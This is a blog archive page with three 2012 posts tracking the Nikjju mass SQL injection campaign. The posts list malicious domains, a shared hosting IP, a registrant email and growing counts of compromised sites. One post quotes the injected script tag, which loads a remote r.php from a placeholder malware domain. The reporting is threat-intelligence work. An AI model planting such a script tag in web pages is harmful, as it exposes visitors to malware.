Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Mass Injection. Show all posts
Mass Injection
Malware Report Mass Injection

skdjui.com : a New domain for the Nikjju SQL Injection attack

I have been tracking the Nikjju SQL Injection attack, an ongoing mass SQL injection attack, today i found another malicious domain that has been used in this attack.  The domain 'skdjui.com' is registered yesterday only(May 8,2012).

There is nothing surprise about Registrant details. Yes, it has same registrant details ,registered with same mail id 'jamesnorthone[at]hotmailbox.com'.

Exploiting the vulnerability in websites and injecting malicious scripts is not new one. Last year hackers inject malicious iFrame in lot of sites , researchers dubbed the attack as 'Lizamoon'.

The list of Malicious domains:
  1. Nikjju.com
  2. hgbyju.com
  3. hnjhkm.com
  4. njukol.com
  5. Uhjiku.com
  6. Uhijku.com
  7. skdjui.com
As i said before, All domains are hosted at 31.210.100.242 and has same registrant details.All domains uses the same file called 'r.php' for injection.


Uhjiku domain created on May 5 and skdjui created on May 8, hackers took only 3 days for creating another domain.

If you visit the compromised sites , the site will redirect you to malware distributing domain. 
Read more »
Mass Injection
Breaking News Mass Injection

uhjiku.com injection rate is increasing day by day :150+ sites compromised



I have been tracking a new SQL injection attack that started on May 5,2012.  On May 6, the number of sites compromised is around 10.  Today, more than 150 websites have been compromised with  uhjiku.com injection.


You can find the details about uhjiku.com injection here:
http://www.ehackingnews.com/2012/05/uhjiku-com-injection-nikjju-sql.html

We have reported about this injection to some security vendors, but there is no response from them.  I think they will respond to this after mass injection :)

[UPDATE] May 8, a number of compromised increased to 200.
Read more »
Mass Injection
Breaking News Malware Report Mass Injection

Uhjiku. com Injection: Nikjju SQL Injection attack



CyberCrimals behind the Nikjju Mass injection attack, continue their SQL injection attack against ASP/ASP.net websites.  Last month, Sucuri reported that more than 180,000 websites compromised.

Hackers compromised vulnerable sites by injection the following malicious script:
    <script src=[Malware_Domain]/r.php ></script>

It seems like hackers registering new domains every week for this attack.  Recently, F-Secure discovered a new domain 'njukol[dot]com'.  The domain is registered on April 28 .

While analyzing one of the compromised websites, i found that there is new fresh domain has been used in this attack, 'Uhjiku[dot]com/r.php'. The Uhjiku is registered on May 5,2012(Yesterday).

The list of Malicious Domains:
  • Nikjju.com
  • hgbyju.com
  • njukol.com
  • Uhjiku.com
All domains are hosted at 31.210.100.242 and has same registrant details.


Read more »
Subscribe to: Posts (Atom)